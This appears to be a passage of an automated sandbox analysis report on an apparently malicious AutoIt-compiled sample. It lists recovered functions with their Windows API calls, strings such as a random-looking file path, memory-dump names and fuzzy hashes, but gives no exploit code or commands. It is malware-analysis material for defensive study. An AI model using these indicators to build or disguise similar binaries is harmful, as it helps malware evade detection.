                                            0x012f9689
                                            0x012f968c
                                            0x0131e08c
                                            0x0131e090
                                            0x0131e093
                                            0x0131e094
                                            0x0131e09c
                                            0x0131e09d
                                            0x0131e0a2
                                            0x012f9692
                                            0x012f9692
                                            0x012f9695
                                            0x0131e0aa
                                            0x0131e0ae
                                            0x0131e0b0
                                            0x0131e0b7
                                            0x0131e0b7
                                            0x0131e0b0
                                            0x012f9695
                                            0x012f968c
                                            0x012f9683
                                            0x012f967a
                                            0x00000000
                                            0x012f9671
                                            0x012f9630
                                            0x012f9637
                                            0x012f963a
                                            0x012f963f
                                            0x0131e00f
                                            0x0131e017
                                            0x0131e020
                                            0x00000000
                                            0x0131e020
                                            0x00000000
                                            0x012f95be
                                            0x012f95c4
                                            0x00000000
                                            0x012f95c4
                                            0x012f95bc
                                            0x012f958c
                                            0x012f954d
                                            0x012f953b
                                            0x012f949d
                                            0x0131d751
                                            0x0131d758
                                            0x00000000
                                            0x00000000
                                            0x0131d75e
                                            0x012f94ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012f94ba
                                            0x00000000
                                            0x012f9480

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Peek$DispatchSleepTranslate
                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                            • API String ID: 1762048999-758534266
                                            • Opcode ID: 1ac7394ea1d26de63dc502c3632cf28f973170578ac18eb6ecaaf2b54431b077
                                            • Instruction ID: 6f63459db22080a9ce6367841add54a29f2c677bf5ad5aa17e273401ae13ee38
                                            • Opcode Fuzzy Hash: 1ac7394ea1d26de63dc502c3632cf28f973170578ac18eb6ecaaf2b54431b077
                                            • Instruction Fuzzy Hash: 5162D3716143429FDB29DF68C888BAAFBE5BF95308F00492DF74987245D770E489CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0135ED23, Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 012F2390: _wcslen.LIBCMT ref: 012F239D
                                              • Part of subcall function 012F2390: _memmove.LIBCMT ref: 012F23C3
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0135EE0E
                                            • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0135F1FA
                                            • IsWindow.USER32(?), ref: 0135F22F
                                            • GetDesktopWindow.USER32 ref: 0135F2EB
                                            • EnumChildWindows.USER32 ref: 0135F2F2
                                            • EnumWindows.USER32(01351059,?), ref: 0135F2FA
                                              • Part of subcall function 013359E6: _wcslen.LIBCMT ref: 013359F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                            • API String ID: 329138477-1919597938
                                            • Opcode ID: b2241104ecc7e414a1dac6248e071064470885ee4597eb568e3183ec522117e1
                                            • Instruction ID: af592f8fee84ab1e14ecd2757b1ecda1599086d034990e4cee089cae7a41e9ba
                                            • Opcode Fuzzy Hash: b2241104ecc7e414a1dac6248e071064470885ee4597eb568e3183ec522117e1
                                            • Instruction Fuzzy Hash: BFF1E5724243429BCB10EF64D880EABF7B8BFA5708F04492DFE4557245DB71E909CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FA9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _malloc
                                            • String ID: Default
                                            • API String ID: 1579825452-753088835
                                            • Opcode ID: 612d1fd44044588fbc0fc69328ac0a5ed322e35f61cee1c959417db4d76160d0
                                            • Instruction ID: f87f6fefcaaaee93e02648c4bb1fa7864b059e265ae8756c65ffa1ffbd97d31a
                                            • Opcode Fuzzy Hash: 612d1fd44044588fbc0fc69328ac0a5ed322e35f61cee1c959417db4d76160d0
                                            • Instruction Fuzzy Hash: B7728D70624306CFD724DF28C580B2AFBF5AF99318F14882DEA8A8B355D771E845CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F1340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,?,?,?), ref: 012F1376
                                            • KillTimer.USER32(?,00000001), ref: 012F13F9
                                              • Part of subcall function 012F1240: _memset.LIBCMT ref: 012F126B
                                              • Part of subcall function 012F1240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 012F129B
                                            • PostQuitMessage.USER32(00000000), ref: 012F140B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow_memset
                                            • String ID: TaskbarCreated
                                            • API String ID: 1519149367-2362178303
                                            • Opcode ID: bce209a1696ab5636beb1a4a6b5767eb328ac1c275b94c78fb557839eb0894f9
                                            • Instruction ID: b80110f5f86f9a31df19fa0f4684110f2410c924bae2a68275d192a536da2d6b
                                            • Opcode Fuzzy Hash: bce209a1696ab5636beb1a4a6b5767eb328ac1c275b94c78fb557839eb0894f9
                                            • Instruction Fuzzy Hash: 8D41167262420DDBEB30DB5CEC85FAEB75DF751324F80012EFB0597685C2B1986087A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FFE90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __fread_nolock_fseek_memmove
                                            • String ID: AU3!$EA06
                                            • API String ID: 3969463491-2658333250
                                            • Opcode ID: 86de3d537dc7c25bd8fd9e78c8b94d576750b90959785c8a904ac1cff1de84e9
                                            • Instruction ID: d8064d46481b4a7595134afd55dc68e22f5d01b62a1cf1a17d97fcac15ab1338
                                            • Opcode Fuzzy Hash: 86de3d537dc7c25bd8fd9e78c8b94d576750b90959785c8a904ac1cff1de84e9
                                            • Instruction Fuzzy Hash: 9C417C73A141499BDF16CF68C890FFD7BA4AB1A304F5401BCE785C7282E6709545CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F1490, Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 012F14BC
                                              • Part of subcall function 012F1E00: _memset.LIBCMT ref: 012F1E90
                                              • Part of subcall function 012F1E00: _wcsncpy.LIBCMT ref: 012F1ED2
                                              • Part of subcall function 012F1E00: _wcscpy.LIBCMT ref: 012F1EF1
                                              • Part of subcall function 012F1E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 012F1F03
                                            • KillTimer.USER32(?,?,?,?,?), ref: 012F1513
                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 012F1522
                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01317BC8
                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01317C1C
                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01317C67
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                            • String ID:
                                            • API String ID: 1792922140-0
                                            • Opcode ID: 1c46dcdf53a64df353cbae4a1ed82f7280879cacff33e30299a6dd11a167f075
                                            • Instruction ID: eb83aa7c1c468970ac246a8e7c1d944619ffeef591f6fc0e855f29f442492f07
                                            • Opcode Fuzzy Hash: 1c46dcdf53a64df353cbae4a1ed82f7280879cacff33e30299a6dd11a167f075
                                            • Instruction Fuzzy Hash: 6A31B470614649FFEB3ACB24D899BE6FBBDFB46304F044199E28D67140C7705A94CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FF3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                            Download Yara Rule
                                            APIs
                                            • SHGetMalloc.SHELL32(012FF1FC), ref: 012FF3BD
                                            • SHGetDesktopFolder.SHELL32(?,013990E8), ref: 012FF3D2
                                            • _wcsncpy.LIBCMT ref: 012FF3ED
                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 012FF427
                                            • _wcsncpy.LIBCMT ref: 012FF440
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                            • String ID: C:\84086963\fqficjon.emu
                                            • API String ID: 3170942423-902905223
                                            • Opcode ID: 5976339bc8a98804b10bd028ac7aac985ef3f0e0ade12a2c2992e2313942cfd8
                                            • Instruction ID: d2f3394e763d0184c08db253991292512ba5bee37d863194d47bc0e0e36cf327
                                            • Opcode Fuzzy Hash: 5976339bc8a98804b10bd028ac7aac985ef3f0e0ade12a2c2992e2313942cfd8
                                            • Instruction Fuzzy Hash: B3217676A01219ABC714EBA4DC84DEFB37DEF89704F108598EA09D7254E6309E45DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013049DA, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                            • String ID:
                                            • API String ID: 4048096073-0
                                            • Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                                            • Instruction ID: 7aca5d74f517356e1884462058ed02fb3f22f434ca0608c21eca7166c7dfbae1
                                            • Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                                            • Instruction Fuzzy Hash: 8E51E631A00709DBEB269FAD886479EBBF5AF50328F148269EB65631D0D370DF90CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013014F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • _malloc.LIBCMT ref: 01301511
                                              • Part of subcall function 013034DB: __FF_MSGBANNER.LIBCMT ref: 013034F4
                                              • Part of subcall function 013034DB: __NMSG_WRITE.LIBCMT ref: 013034FB
                                              • Part of subcall function 013034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01306A35,?,00000001,?,?,01308179,00000018,0137D180,0000000C,01308209), ref: 01303520
                                            • std::exception::exception.LIBCMT ref: 01301546
                                            • std::exception::exception.LIBCMT ref: 01301560
                                            • __CxxThrowException@8.LIBCMT ref: 01301571
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                            • String ID:
                                            • API String ID: 615853336-0
                                            • Opcode ID: 9fcd087f4a4e5f7814a8e9a7b87656d7e83da2bd45658fbefb7b5fa861f596b1
                                            • Instruction ID: 58cf509ba88d9d239803b37f01497910b94abefa8218fa46bfe40b0bee7c0082
                                            • Opcode Fuzzy Hash: 9fcd087f4a4e5f7814a8e9a7b87656d7e83da2bd45658fbefb7b5fa861f596b1
                                            • Instruction Fuzzy Hash: F3F0287590020AABDB37FF6DD821A6E7AEDEB4031CF040058E4059A1C0CB71DB04CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FF490, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                                            • String ID: C:\84086963\fqficjon.emu$?T
                                            • API String ID: 3898977315-3715668739
                                            • Opcode ID: fedb7801ef859c1a44c3f1366eec62baaeac01d489dcccaa495113cb60fbaf03
                                            • Instruction ID: 62dec9ec2c85e9d47663a7283986000cde4ce81c302f7f57b3d26dd9c2d5ba09
                                            • Opcode Fuzzy Hash: fedb7801ef859c1a44c3f1366eec62baaeac01d489dcccaa495113cb60fbaf03
                                            • Instruction Fuzzy Hash: 7A2127B2A142026BD718EF789C91A6EF7D8AF54300F14893EE755C32C0EB34E6548792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F1D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                            • _memmove.LIBCMT ref: 012F1D57
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301546
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301560
                                              • Part of subcall function 013014F7: __CxxThrowException@8.LIBCMT ref: 01301571
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                            • String ID: @EXITCODE
                                            • API String ID: 2734553683-3436989551
                                            • Opcode ID: 00cdc1e6a748b636fe3a1bcc78d1773207b3a0147f761e9a7fc20baae1534c91
                                            • Instruction ID: 54a382bd8eded6f8f5278f941b3a5ab28b4a04f7099bbc986552ee7610d77928
                                            • Opcode Fuzzy Hash: 00cdc1e6a748b636fe3a1bcc78d1773207b3a0147f761e9a7fc20baae1534c91
                                            • Instruction Fuzzy Hash: 5EF062F2A506425FD755DB78CC52B3775E49B54708F05C83DD18AC6790FAB9E4418B10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0132297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • _strlen.LIBCMT ref: 01322991
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,01344515,00000000,00000000,?,?,?,01344515,?,000000FF), ref: 013229A6
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,01344515,00000000,00000000,000000FF), ref: 013229E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharMultiWide$_strlen
                                            • String ID:
                                            • API String ID: 1433632580-0
                                            • Opcode ID: 611d142547ce270e098fc6e4651a1a895307ffc31f2c51f31f8e482f9a2f1d22
                                            • Instruction ID: f2d9347382a8e0f6f8f8932eea70a3b0f388e5667e08524c3b6efa4b3ca3c6b0
                                            • Opcode Fuzzy Hash: 611d142547ce270e098fc6e4651a1a895307ffc31f2c51f31f8e482f9a2f1d22
                                            • Instruction Fuzzy Hash: 7C01A7377411143BE721655DAC85FABBB9DDBC5BB8F050125FB1DDB2D0E9A1E80042A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FFE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcslen.LIBCMT ref: 012FFE35
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,013443ED,?,00000000,?,?), ref: 012FFE4E
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 012FFE77
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharMultiWide$_wcslen
                                            • String ID:
                                            • API String ID: 2761822629-0
                                            • Opcode ID: ba6432433062d4c9732f6eb620aa413a8d3268d4461ae782a9e7e09e77c8ea23
                                            • Instruction ID: 70f29548076599812322abf1b9d5f9e0caaa600cfd3ba22f35ba78a1c4f26774
                                            • Opcode Fuzzy Hash: ba6432433062d4c9732f6eb620aa413a8d3268d4461ae782a9e7e09e77c8ea23
                                            • Instruction Fuzzy Hash: 85018672B5021576E63059AD6C06F67F69CDB86F65F10027DFB18A62C1E5A1A80081A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F2AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                            • String ID:
                                            • API String ID: 2388904642-0
                                            • Opcode ID: 7bb9adb687cfae1068fdb15da5400290cfc198464beab5ed470353ea260a0a23
                                            • Instruction ID: 63034355ef1f91742012f90de4a433a9801323e1c5823d082c3629ff48ae649f
                                            • Opcode Fuzzy Hash: 7bb9adb687cfae1068fdb15da5400290cfc198464beab5ed470353ea260a0a23
                                            • Instruction Fuzzy Hash: 23F1AE7592010ADBDB14EF98C881AFEF7B4EF16304F65403ADA05672A4D631EE42CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FB1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID:
                                            • API String ID: 1473721057-0
                                            • Opcode ID: 2d264f34d28408c89454616da61df1e744b0c378b21e9614825c83ac4ee59202
                                            • Instruction ID: f9b564bc23f37c120f35d567a2bc325ca6b85b37233743034040bb13895d6c7b
                                            • Opcode Fuzzy Hash: 2d264f34d28408c89454616da61df1e744b0c378b21e9614825c83ac4ee59202
                                            • Instruction Fuzzy Hash: 1F91BD74A20105CFEB14DFACC885AADB7F5EF4A308F14C46DDA05AB255D771E841CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FC440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
                                            • Instruction ID: 2385ba5007c4d403c891ba51daf5ac8a6d661560da42d22d95afa89a2efaf26f
                                            • Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
                                            • Instruction Fuzzy Hash: 1151A771A1014AABDB14DF68C890FBBF7B8FF44318F04846DEA1997245E774E990C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01356C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
